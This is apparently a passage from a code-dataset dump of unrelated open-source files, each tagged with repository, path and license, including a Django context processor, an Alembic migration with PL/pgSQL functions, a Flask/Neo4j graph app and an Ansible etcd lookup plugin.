return sum(ErosWashoff_f(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, Acoef, KF, LS,
C, P, Area), axis=1)
|
WikiWatershed/gwlf-e
|
gwlfe/MultiUse_Fxns/Erosion/LuErosion.py
|
Python
|
apache-2.0
| 918
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
test_bifrost
----------------------------------
Tests for `bifrost` module.
"""
from bifrost.tests import base
class TestBifrost(base.TestCase):
def test_something(self):
pass
|
devananda/bifrost
|
bifrost/tests/test_bifrost.py
|
Python
|
apache-2.0
| 768
|
#!/usr/bin/env python3
# Copyright (C) 2017 Freie Universität Berlin
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
from testrunner import run
def testfunc(child):
child.expect(r'OK \(\d+ tests\)', timeout=120)
if __name__ == "__main__":
sys.exit(run(testfunc))
|
x3ro/RIOT
|
tests/pkg_relic/tests/01-run.py
|
Python
|
lgpl-2.1
| 411
|
#!/usr/bin/python
############################################################
# <bsn.cl fy=2013 v=onl>
#
# Copyright 2013, 2014 Big Switch Networks, Inc.
#
# Licensed under the Eclipse Public License, Version 1.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
#
# </bsn.cl>
############################################################
#
# Generate a new Open Network Linux platform configuration
# component.
#
############################################################
import time
import sys
import os
from compgen import ComponentGenerator
class PlatformConfigGenerator(ComponentGenerator):
def __init__(self, platform, vendor):
self.platform = platform
self.vendor = vendor
self.Vendor = vendor.title()
summary="Platform Configuration files for %s." % self.platform
ComponentGenerator.__init__(self, platform, "platform-config-" + self.platform,
"all", summary, summary)
def _required_packages(self):
p = "vendor-config-onl:all"
if self.vendor != "none":
p += " vendor-config-%s:all" % self.vendor
return p
def _makefile_dot_comp_all_rules(self):
return "\t@echo Run 'make deb'"
def _rules(self):
return """#!/usr/bin/make -f
PLATFORM_NAME=%(platform)s
BRCM_PLATFORM_NAME=none
include $(ONL)/make/platform-config-rules.mk
""" % (self.__dict__)
def __generate_file(self, path, name, contents):
if not os.path.exists(path):
os.makedirs(path)
with open("%s/%s" % (path, name), "w") as f:
f.write(contents)
def _install(self):
return "/lib/platform-config/*"
def generate(self, path):
# Generate the entire component:
ComponentGenerator.generate(self, path)
self.path = "%s/%s" % (path, self.platform)
# the platform directory layout is this
os.makedirs('%(path)s/src/install' % (self.__dict__))
os.makedirs('%(path)s/src/boot' % (self.__dict__))
os.makedirs('%(path)s/src/sbin' % (self.__dict__))
os.makedirs('%(path)s/src/python' % (self.__dict__))
self.__generate_file('%(path)s/src' % self.__dict__, 'name', self.platform+'\n')
self.__generate_file('%(path)s/src/install' % self.__dict__,
'%(platform)s.sh' % self.__dict__,
"# Platform data goes here.")
self.__generate_file('%(path)s/src/sbin' % self.__dict__,
'gpio_init',
"""# platform: %(platform)s
exit 0
""" % self.__dict__)
self.__generate_file('%(path)s/src/boot' % self.__dict__,
self.platform,
"# Platform data goes here.")
self.__generate_file('%(path)s/src/boot' % self.__dict__,
'detect.sh',
"""# Default platform detection.
if grep -q "^model.*: %(platform)s$" /proc/cpuinfo; then
echo "%(platform)s" >/etc/sl_platform
exit 0
else
exit 1
fi
""" % self.__dict__)
self.__generate_file('%(path)s/src/python' % self.__dict__,
'slpc.py',
"""#!/usr/bin/python
############################################################
#
# Platform Driver for %(platform)s
#
############################################################
import os
import struct
import time
import subprocess
from onl.platform.base import *
from onl.vendor.%(vendor)s import *
class OpenNetworkPlatformImplementation(OpenNetworkPlatform%(Vendor)s):
def model(self):
raise Exception()
def platform(self):
return '%(platform)s'
def _plat_info_dict(self):
raise Exception()
def oid_table(self):
raise Exception()
if __name__ == "__main__":
print OpenNetworkPlatformImplementation()
""" % self.__dict__)
if __name__ == '__main__':
if len(sys.argv) != 3:
print "usage: %s <platform-name> <vendor-name>" % sys.argv[0]
sys.exit(1)
pc = PlatformConfigGenerator(sys.argv[1], sys.argv[2])
pc.generate('.')
|
capveg/ONL
|
tools/py/pcgen.py
|
Python
|
epl-1.0
| 4,616
|
# Copyright (c) 2013 Hesky Fisher
# See LICENSE.txt for details.
from orthography import add_suffix
import unittest
class OrthographyTestCase(unittest.TestCase):
def test_add_suffix(self):
cases = (
('artistic', 'ly', 'artistically'),
('cosmetic', 'ly', 'cosmetically'),
('establish', 's', 'establishes'),
('speech', 's', 'speeches'),
('approach', 's', 'approaches'),
('beach', 's', 'beaches'),
('arch', 's', 'arches'),
('larch', 's', 'larches'),
('march', 's', 'marches'),
('search', 's', 'searches'),
('starch', 's', 'starches'),
('stomach', 's', 'stomachs'),
('monarch', 's', 'monarchs'),
('patriarch', 's', 'patriarchs'),
('oligarch', 's', 'oligarchs'),
('cherry', 's', 'cherries'),
('day', 's', 'days'),
('penny', 's', 'pennies'),
('pharmacy', 'ist', 'pharmacist'),
('melody', 'ist', 'melodist'),
('pacify', 'ist', 'pacifist'),
('geology', 'ist', 'geologist'),
('metallurgy', 'ist', 'metallurgist'),
('anarchy', 'ist', 'anarchist'),
('monopoly', 'ist', 'monopolist'),
('alchemy', 'ist', 'alchemist'),
('botany', 'ist', 'botanist'),
('therapy', 'ist', 'therapist'),
('theory', 'ist', 'theorist'),
('psychiatry', 'ist', 'psychiatrist'),
('lobby', 'ist', 'lobbyist'),
('hobby', 'ist', 'hobbyist'),
('copy', 'ist', 'copyist'),
('beauty', 'ful', 'beautiful'),
('weary', 'ness', 'weariness'),
('weary', 'some', 'wearisome'),
('lonely', 'ness', 'loneliness'),
('narrate', 'ing', 'narrating'),
('narrate', 'or', 'narrator'),
('generalize', 'ability', 'generalizability'),
('reproduce', 'able', 'reproducible'),
('grade', 'ations', 'gradations'),
('urine', 'ary', 'urinary'),
('achieve', 'able', 'achievable'),
('polarize', 'ation', 'polarization'),
('done', 'or', 'donor'),
('analyze', 'ed', 'analyzed'),
('narrate', 'ing', 'narrating'),
('believe', 'able', 'believable'),
('animate', 'ors', 'animators'),
('discontinue', 'ation', 'discontinuation'),
('innovate', 'ive', 'innovative'),
('future', 'ists', 'futurists'),
('illustrate', 'or', 'illustrator'),
('emerge', 'ent', 'emergent'),
('equip', 'ed', 'equipped'),
('defer', 'ed', 'deferred'),
('defer', 'er', 'deferrer'),
('defer', 'ing', 'deferring'),
('pigment', 'ed', 'pigmented'),
('refer', 'ed', 'referred'),
('fix', 'ed', 'fixed'),
('alter', 'ed', 'altered'),
('interpret', 'ing', 'interpreting'),
('wonder', 'ing', 'wondering'),
('target', 'ing', 'targeting'),
('limit', 'er', 'limiter'),
('maneuver', 'ing', 'maneuvering'),
('monitor', 'ing', 'monitoring'),
('color', 'ing', 'coloring'),
('inhibit', 'ing', 'inhibiting'),
('master', 'ed', 'mastered'),
('target', 'ing', 'targeting'),
('fix', 'ed', 'fixed'),
('scrap', 'y', 'scrappy'),
('trip', 's', 'trips'),
('equip', 's', 'equips'),
('bat', 'en', 'batten'),
('smite', 'en', 'smitten'),
('got', 'en', 'gotten'),
('bite', 'en', 'bitten'),
('write', 'en', 'written'),
('flax', 'en', 'flaxen'),
('wax', 'en', 'waxen'),
('fast', 'est', 'fastest'),
('white', 'er', 'whiter'),
('crap', 'y', 'crappy'),
('lad', 'er', 'ladder'),
)
failed = []
for word, suffix, expected in cases:
if add_suffix(word, suffix) != expected:
failed.append((word, suffix, expected))
for word, suffix, expected in failed:
print 'add_suffix(%s, %s) is %s not %s' % (word, suffix, add_suffix(word, suffix),expected)
self.assertEqual(len(failed), 0)
if __name__ == '__main__':
unittest.main()
|
blockbomb/plover
|
plover/test_orthography.py
|
Python
|
gpl-2.0
| 4,487
|
def ga_key(request):
from django.conf import settings
return {'ga_key': settings.GOOGLE_ANALYTICS_KEY}
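# A minimal sketch of wiring this processor up; the dotted path depends on the
# project layout and is an assumption here. Once enabled, every template can
# read the key directly:
#
#     # settings.py
#     GOOGLE_ANALYTICS_KEY = 'UA-XXXXXXXX-1'
#     TEMPLATES[0]['OPTIONS']['context_processors'].append(
#         'tokoku.context_processors.ga_key')
#
#     <!-- any template -->
#     <script>ga('create', '{{ ga_key }}', 'auto');</script>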
|
mrpindo/openshift-estore
|
tokoku/tokoku/context_processors.py
|
Python
|
gpl-2.0
| 111
|
# file openpyxl/shared/units.py
# Copyright (c) 2010-2011 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
import math
def pixels_to_EMU(value):
return int(round(value * 9525))
def EMU_to_pixels(value):
if not value:
return 0
else:
return round(value / 9525.)
def EMU_to_cm(value):
if not value:
return 0
else:
return (EMU_to_pixels(value) * 2.57 / 96)
def pixels_to_points(value):
return value * 0.67777777
def points_to_pixels(value):
if not value:
return 0
else:
return int(math.ceil(value * 1.333333333))
def degrees_to_angle(value):
return int(round(value * 60000))
def angle_to_degrees(value):
if not value:
return 0
else:
return round(value / 60000.)
def short_color(color):
""" format a color to its short size """
if len(color) > 6:
return color[2:]
else:
return color
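# A small worked example of the conversions above; the helper is illustrative
# only and is never called by the library.
def _example_conversions():
    # 1 inch at 96 dpi is 96 px, i.e. 96 * 9525 = 914400 EMU
    assert pixels_to_EMU(96) == 914400
    assert EMU_to_pixels(914400) == 96
    # drawing rotations are stored in 1/60000ths of a degree
    assert degrees_to_angle(45) == 2700000
    assert angle_to_degrees(2700000) == 45
    # ARGB colours such as 'FF00FF00' lose their alpha byte
    assert short_color('FF00FF00') == '00FF00'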
|
sbhowmik7/PSSEcompare
|
ext_libs/openpyxl/shared/units.py
|
Python
|
gpl-3.0
| 2,039
|
from .image import Image
from .product_category import ProductCategory
from .supplier import Supplier, PaymentMethod
from .product import Product
from .product import ProductImage
from .enum_values import EnumValues
from .related_values import RelatedValues
from .customer import Customer
from .expense import Expense
from .incoming import Incoming
from .shipping import Shipping, ShippingLine
from .receiving import Receiving, ReceivingLine
from .inventory_transaction import InventoryTransaction, InventoryTransactionLine
from .purchase_order import PurchaseOrder, PurchaseOrderLine
from .sales_order import SalesOrder, SalesOrderLine
from .user import User
from .role import Role, roles_users
from .organization import Organization
from .inventory_in_out_link import InventoryInOutLink
from .aspects import update_menemonic
from .product_inventory import ProductInventory
|
betterlife/psi
|
psi/app/models/__init__.py
|
Python
|
mit
| 875
|
"""update db functions
Revision ID: 8a786f9bf241
Revises: 0c2ff8b95c98
Create Date: 2017-09-27 00:11:13.429144
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8a786f9bf241'
down_revision = '0c2ff8b95c98'
branch_labels = None
depends_on = None
def upgrade():
conn = op.get_bind()
conn.execute('drop function if exists update_courses(numeric, jsonb)')
conn.execute(sa.text("""create or replace function update_departments(_university_id numeric, _json jsonb)
returns numeric as $func$
declare
_s_id numeric;
_d_id numeric;
_count numeric := 0;
_abbr varchar;
_name varchar;
_school varchar;
begin
for _abbr, _name, _school in
select
department ->> 'value' as _abbr,
(regexp_matches(department ->> 'label', '.+(?=\()')) [1] as _name,
department ->> 'school' as _school
from jsonb_array_elements(_json -> 'departments') department
loop
-- get the school id
select id
into _s_id
from schools
where abbreviation = _school and university_id = _university_id;
-- get the department id if it exists
select id
into _d_id
from departments
where school_id = _s_id and abbreviation = _abbr;
-- if department does not exist, create it
if _d_id is null
then
insert into departments (abbreviation, name, school_id) values (_abbr, _name, _s_id);
end if;
_count = _count + 1;
end loop;
return _count;
end;
$func$ language plpgsql;"""))
conn.execute(sa.text("""create or replace function update_courses(_university_id numeric, _json jsonb)
returns numeric as $func$
declare
_d_id numeric;
_c_id numeric;
_p_id numeric;
_quarter numeric;
_latest_quarter numeric;
_s_id numeric;
_department varchar;
_number varchar;
_title varchar;
_professor1 varchar[];
_professor2 varchar[];
_professor3 varchar[];
_professors varchar[][];
_professor varchar[];
_count numeric := 0;
_new_course boolean := false;
begin
for
_quarter,
_department,
_number,
_title,
_professor1,
_professor2,
_professor3
in
select
(course ->> 'term')::int as _quarter,
course ->> 'subject' as _department,
course ->> 'catalog_nbr' as _number,
course ->> 'class_descr' as _title,
-- prof #1
case
when (course ->> 'instr_1') like '%, %' then
array[
split_part(course ->> 'instr_1', ', ', 1),
split_part(course ->> 'instr_1', ', ', 2)
]
when (course ->> 'instr_1') = '' then
null
end as _professor1,
-- prof #2
case
when (course ->> 'instr_2') like '%, %' then
array[
split_part(course ->> 'instr_2', ', ', 1),
split_part(course ->> 'instr_2', ', ', 2)
]
when (course ->> 'instr_2') = '' then
null
end as _professor2,
-- prof #3
case
when (course ->> 'instr_3') like '%, %' then
array[
split_part(course ->> 'instr_3', ', ', 1),
split_part(course ->> 'instr_3', ', ', 2)
]
when (course ->> 'instr_3') = '' then
null
end as _professor3
from jsonb_array_elements(_json -> 'courses') course
loop
if _professor1 is null then continue; end if;
-- get the department id (assume it exists)
select departments.id into _d_id
from departments
where abbreviation = _department
order by school_id limit 1;
-- get the course id if it exists
select id into _c_id
from courses
where department_id = _d_id and number = _number;
-- if the course does not exist, create it
if _c_id is null then
insert into courses (department_id, number, title) values (_d_id, _number, _title)
returning id into _c_id;
_new_course = true;
end if;
-- get the section id if it exists
select id into _s_id
from sections
where quarter_id = _quarter and course_id = _c_id;
-- if the section does not exist, create it
if _s_id is null then
insert into sections (quarter_id, course_id) values (_quarter, _c_id)
returning id into _s_id;
end if;
_professors = array[_professor1];
if _professor2 is not null then _professors = array_cat(_professors, _professor2); end if;
if _professor3 is not null then _professors = array_cat(_professors, _professor3); end if;
foreach _professor slice 1 in array _professors
loop
if _professor[1] is null then continue; end if;
-- get the professor id if it exists
select id into _p_id
from professors
where last_name = _professor[2] and first_name = _professor[1];
-- if the professor does not exist, create it
if _p_id is null then
insert into professors (first_name, last_name, university_id)
values (_professor[1], _professor[2], _university_id)
returning id into _p_id;
end if;
-- check if the professer is listed under this section
if not exists(select 1
from section_professor sp
where sp.section_id = _s_id and sp.professor_id = _p_id)
then
insert into section_professor (section_id, professor_id) values (_s_id, _p_id);
end if;
end loop;
-- if the course existed, make sure the title is up to date
if not _new_course then
-- get the latest quarter which the course was offered in
select q.id into _latest_quarter
from quarters q
join sections s on q.id = s.quarter_id
join courses c on s.course_id = c.id
where c.id = _c_id and q.university_id = _university_id
order by lower(period) desc
limit 1;
-- if this course info is for the latest quarter, update the title
if _quarter = _latest_quarter then
update courses
set title = _title
where id = _c_id;
end if;
end if;
_count = _count + 1;
end loop;
return _count;
end;
$func$ language plpgsql;"""))
def downgrade():
pass
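# A minimal sketch of how the functions created above are invoked from SQL once
# the migration has run; the university id (1) and the payload contents are
# placeholders inferred from the function bodies:
#
#     select update_departments(1, '{"departments": [
#         {"value": "COEN", "label": "Computer Engineering (COEN)", "school": "EGR"}
#     ]}'::jsonb);
#
#     select update_courses(1, '{"courses": [
#         {"term": 3900, "subject": "COEN", "catalog_nbr": "12",
#          "class_descr": "Abstract Data Types", "instr_1": "Doe, Jane",
#          "instr_2": "", "instr_3": ""}
#     ]}'::jsonb);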
|
SCUEvals/scuevals-api
|
db/alembic/versions/20170927001113_update_db_functions.py
|
Python
|
agpl-3.0
| 6,092
|
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Sylvain Boily
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from xivo_confd import BasePlugin
from popc_stats.database import create_db
from popc_stats.config import init_config
from views import popc
class XiVOPopcStats(BasePlugin):
def load(self, app, config):
config_popc = init_config()
db_session = create_db(config_popc)
app.register_blueprint(popc)
|
sboily/xivo-popc-stats
|
popc_stats/plugins/popcstats/load.py
|
Python
|
gpl-3.0
| 1,022
|
# coding: utf-8
"""
Command Wrapper.
A command wrapper to get a live output displayed.
"""
import subprocess
import sys
from click import echo, style
def launch_cmd_displays_output(cmd: list, print_msg: bool = True, print_err: bool = True,
err_to_out: bool = False):
"""Launch a command and displays conditionally messages and / or errors."""
try:
stderr = subprocess.PIPE if err_to_out is False else subprocess.STDOUT
result = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=stderr)
except Exception as error:
raise SystemError('Cannot run the command: {}'.format(error))
_read_messages(result, print_msg)
if print_err is True and err_to_out is False:
_print_errors(result)
return result
def verbose(display: bool, message: str):
"""Display a message if verbose is On."""
if display is True:
echo(style('[VERBOSE]', fg='green') +
' {}'.format(message), file=sys.stderr)
def _read_messages(result: subprocess.Popen, display: bool = False):
"""Print messages sent to the STDOUT."""
for line in result.stdout:
line = line.decode()
line = line if display is True else '.'
print(line, end='')
sys.stdout.flush()
print()
def _print_errors(result: subprocess.Popen):
"""Print messages sent to the STDERR."""
num = 0
for line in result.stderr:
err = line.decode()
if num == 0:
print(style("Command returned errors :", fg='red'))
if num < 5:
print(err, end='')
elif num == 5:
print(style('... and more', fg='red'))
num += 1
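# A minimal, self-contained demonstration of the public helper; the command is
# an arbitrary placeholder and the block only runs when the module is executed
# directly.
if __name__ == '__main__':
    res = launch_cmd_displays_output(['ls', '-la'], print_msg=True, print_err=True)
    print('command finished with exit code', res.wait())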
|
edyan/stakkr
|
stakkr/command.py
|
Python
|
apache-2.0
| 1,711
|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# Standard Library
import logging
# Third Party
from rest_framework.authtoken.models import Token
logger = logging.getLogger(__name__)
def create_token(user, force_new=False):
"""
Creates a new token for a user or returns the existing one.
:param user: User object
:param force_new: forces creating a new token
"""
token = False
try:
token = Token.objects.get(user=user)
except Token.DoesNotExist:
force_new = True
if force_new:
if token:
token.delete()
token = Token.objects.create(user=user)
return token
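# A minimal sketch of a view built on top of this helper; the view name and
# URL wiring are assumptions, not part of wger itself, and the function is
# never called by this module.
def _example_token_view(request):
    """Return the caller's API token as JSON, refreshing it on ?refresh=1."""
    from django.http import JsonResponse
    token = create_token(request.user, force_new='refresh' in request.GET)
    return JsonResponse({'token': token.key})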
|
rolandgeider/wger
|
wger/utils/api_token.py
|
Python
|
agpl-3.0
| 1,240
|
import json
import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../scripts'))
from flask import Flask, render_template, request
from py2neo import neo4j
from ollie import pipeline
app = Flask(__name__)
"""@app.route('/render', method=['POST'])
def render():
pairs = json.loads(request.form['data'])
edges = []
for pair in pairs:
n1 = pair[0]
n2 = pair[2]
rel = pair[1]
edges.append({'source': str(n1), 'target': str(n2), 'type': str(rel)})
return render_template('index4.html', links=edges)
"""
@app.route('/graph', methods=['POST', 'GET'])
def graph():
if request.method == 'POST':
f = request.files['file']
f.save('/tmp/doc.txt')
pairs = pipeline('/tmp/doc.txt')
edges = []
for pair in pairs:
n1 = pair[0]
n2 = pair[2]
rel = pair[1]
edges.append({'source': str(n1), 'target': str(n2), 'type': str(rel)})
#return render_template('graph.html', links=edges)
return json.dumps(edges)
else:
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Relationship, 'relations')
q = relations.query('relation_name:*')
pairs = []
for rel in q:
pairs.append([rel.start_node['name'], rel.type, rel.end_node['name']])
return json.dumps(pairs)
@app.route('/graph/<concept>')
def concept(concept):
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Node, 'concepts')
q = relations.query('concept_name:%s' % concept)
pairs = []
try:
concept = q.next()
except:
return json.dumps(pairs)
rels = concept.match()
for rel in rels:
pairs.append([rel.start_node['name'], rel.type, rel.end_node['name']])
return json.dumps(pairs)
@app.route('/search/<query>')
def search(query):
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
concepts = graph_db.get_index(neo4j.Node, 'concepts')
query = '*' + '*'.join(query.strip().split(' ')) + '*'
print query
q = concepts.query('concept_name:%s' % str(query))
pairs = []
try:
concept = q.next()
except:
return json.dumps(pairs)
rels = concept.match()
for rel in rels:
pairs.append([rel.start_node['name'], rel.type, rel.end_node['name']])
return json.dumps(pairs)
@app.route('/graphical/<concepts>')
def graphical(concepts):
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Node, 'concepts')
query = '"' + '" OR "'.join(concepts.split(',')) + '"'
q = relations.query('concept_name:(%s)' % str(query))
pairs = []
rels = []
concept = None
while True:
try:
concept = q.next()
except:
break
rels += concept.match()
if not concept:
        return json.dumps(pairs)
nodes = {}
edges = []
for rel in rels:
n1 = rel.start_node['name']
n2 = rel.end_node['name']
if n1 not in nodes:
nodes[str(n1)] = {"radius":10.0, "weight":1.00, "centrality":0.00, "fill":"rgba(0,127,255,0.70)", "stroke":"rgba(0,0,0,0.80)"}
if n2 not in nodes:
nodes[str(n2)] = {"radius":10.0, "weight":1.00, "centrality":0.00, "fill":"rgba(0,127,255,0.70)", "stroke":"rgba(0,0,0,0.80)"}
nodes[str(rel.type)] = {"radius":10.0, "weight":1.00, "centrality":0.00, "fill":"rgba(0,127,255,0.70)", "stroke":"rgba(0,0,0,0.80)"}
#edges.append([str(n1), str(rel.type), {"length":50.00, "stroke":"rgba(135,234,135,1.00)"}])
#edges.append([str(rel.type), str(n2), {"length":50.00, "stroke":"rgba(135,234,135,1.00)"}])
edges.append({'source': str(n1), 'target': str(n2), 'type': str(rel.type)})
return render_template('graph.html', links=edges, nodes=nodes)
@app.route('/')
def home():
return render_template('new.html')
@app.route('/browse')
def browse():
concepts = []
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Node, 'concepts')
q = relations.query('concept_name:*')
while True:
try:
concept = q.next()
concepts.append(str(concept['name']))
except:
break
return render_template('browse.html', concepts=concepts)
app.debug = True
app.run()
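# A minimal sketch of exercising the endpoints once the server is up (Flask's
# default http://127.0.0.1:5000); concept names and file names are placeholders:
#
#     curl http://127.0.0.1:5000/graph                     # every stored relation
#     curl http://127.0.0.1:5000/graph/photosynthesis      # relations for one concept
#     curl http://127.0.0.1:5000/search/photo              # wildcard concept search
#     curl -F file=@doc.txt http://127.0.0.1:5000/graph    # extract relations from a document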
|
dash1291/major
|
webserver/app.py
|
Python
|
gpl-3.0
| 4,561
|
#!/usr/bin/python
from pisi.actionsapi import shelltools, get, autotools, pisitools
def setup():
autotools.configure ("--disable-debugging \
--disable-static")
def build():
autotools.make ()
def install():
autotools.install ()
pisitools.dodoc ("COPYING")
|
richard-fisher/repository
|
multimedia/codecs/libmad/actions.py
|
Python
|
gpl-2.0
| 325
|
#!/usr/bin/python
import numpy
from paths.svms import mfeavg200, mfestd200, efeavg200, efestd200
from sequence.rna_tools import RNAFolder
from sequence.seq_tools import kContent
from libsvm import svmutil
FOLDER = RNAFolder(p=True)
def loadRange(fname):
avgs = []
stds = []
with open(fname, encoding='utf-8') as fileobj:
for line in fileobj:
avg, std = line.strip().split()
avgs.append(avg)
stds.append(std)
return numpy.array(avgs, dtype=numpy.float32), numpy.array(stds, dtype=numpy.float32)
def calcFtrs(seq):
ftrs = []
stc, mfe, efe, cstc, cmfe, cdst, frq, div, bpp = FOLDER.fold(seq)
kmer = kContent(seq, 1)
atcg = (kmer['a'] + kmer['t']) / (kmer['a'] + kmer['t'] + kmer['c'] + kmer['g'])
if kmer['a'] + kmer['t'] == 0:
at = 0
else:
at = kmer['a'] / (kmer['a'] + kmer['t'])
if kmer['c'] + kmer['g'] == 0:
cg = 0
else:
cg = kmer['c'] / (kmer['c'] + kmer['g'])
svmftrs = numpy.array((atcg, at, cg))
mfeavg_mdl = svmutil.svm_load_model(mfeavg200)
mfestd_mdl = svmutil.svm_load_model(mfestd200)
efeavg_mdl = svmutil.svm_load_model(efeavg200)
# efestd_mdl = svmutil.svm_load_model(efestd200)
mfeavg_avg, mfeavg_std = loadRange(mfeavg200 + '.rng')
mfestd_avg, mfestd_std = loadRange(mfestd200 + '.rng')
efeavg_avg, efeavg_std = loadRange(efeavg200 + '.rng')
# efestd_avg, efestd_std = loadRange(efestd200 + '.rng')
mfe_avg = svmutil.svm_predict([0],
[((svmftrs - mfeavg_avg) / mfeavg_std).tolist()], mfeavg_mdl, options='-b 1')[0][0]
mfe_std = svmutil.svm_predict([0],
[((svmftrs - mfestd_avg) / mfestd_std).tolist()], mfestd_mdl, options='-b 1')[0][0]
efe_avg = svmutil.svm_predict([0],
[((svmftrs - efeavg_avg) / efeavg_std).tolist()], efeavg_mdl, options='-b 1')[0][0]
# efe_std = svmutil.svm_predict([0],
# [((svmftrs - efestd_avg) / efestd_std).tolist()], efestd_mdl, options='-b 1')[0][0]
ftrs.append(mfe - mfe_avg)
ftrs.append((mfe - mfe_avg) / mfe_std)
ftrs.append(efe - efe_avg)
# ftrs.append((efe - efe_avg) / efe_std)
return numpy.array(ftrs)
def nameFtrs():
ftrs = []
ftrs.append('Generated MFE')
ftrs.append('Generated MFEz')
ftrs.append('Generated EFE')
# ftrs.append('Generated EFEz')
return ftrs
def main(argv):
from Bio import SeqIO
with open(argv[2], 'w') as fileobj:
fileobj.write('\t'.join(nameFtrs()))
fileobj.write('\n')
for ent in SeqIO.parse(argv[1], 'fasta'):
fileobj.write('\t'.join('%.3f' % ftr for ftr in calcFtrs(str(ent.seq))))
fileobj.write('\n')
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
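# A minimal sketch of the command-line invocation implied by main(); the file
# names are placeholders:
#
#     python gen.py transcripts.fasta features.tsv
#
# Each output row holds the MFE/EFE features of one FASTA record, expressed
# relative to the values predicted by the bundled SVM models.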
|
childsish/lhc-python
|
lhc/binf/feature/gen.py
|
Python
|
gpl-2.0
| 2,853
|
# (c) 2013, Jan-Piet Mens <jpmens(at)gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
try:
import json
except ImportError:
import simplejson as json
from ansible.plugins.lookup import LookupBase
from ansible.module_utils.urls import open_url
# this can be made configurable, but should not use ansible.cfg
ANSIBLE_ETCD_URL = 'http://127.0.0.1:4001'
if os.getenv('ANSIBLE_ETCD_URL') is not None:
ANSIBLE_ETCD_URL = os.environ['ANSIBLE_ETCD_URL']
class Etcd:
def __init__(self, url=ANSIBLE_ETCD_URL, validate_certs=True):
self.url = url
self.baseurl = '%s/v1/keys' % (self.url)
self.validate_certs = validate_certs
def get(self, key):
url = "%s/%s" % (self.baseurl, key)
data = None
value = ""
try:
r = open_url(url, validate_certs=self.validate_certs)
data = r.read()
except:
return value
try:
# {"action":"get","key":"/name","value":"Jane Jolie","index":5}
item = json.loads(data)
if 'value' in item:
value = item['value']
if 'errorCode' in item:
value = "ENOENT"
except:
raise
return value
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
if isinstance(terms, basestring):
terms = [ terms ]
validate_certs = kwargs.get('validate_certs', True)
etcd = Etcd(validate_certs=validate_certs)
ret = []
for term in terms:
key = term.split()[0]
value = etcd.get(key)
ret.append(value)
return ret
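# A minimal sketch of using the plugin from a playbook; the key and the etcd
# endpoint are placeholders (the URL is read from ANSIBLE_ETCD_URL, defaulting
# to http://127.0.0.1:4001):
#
#     - debug:
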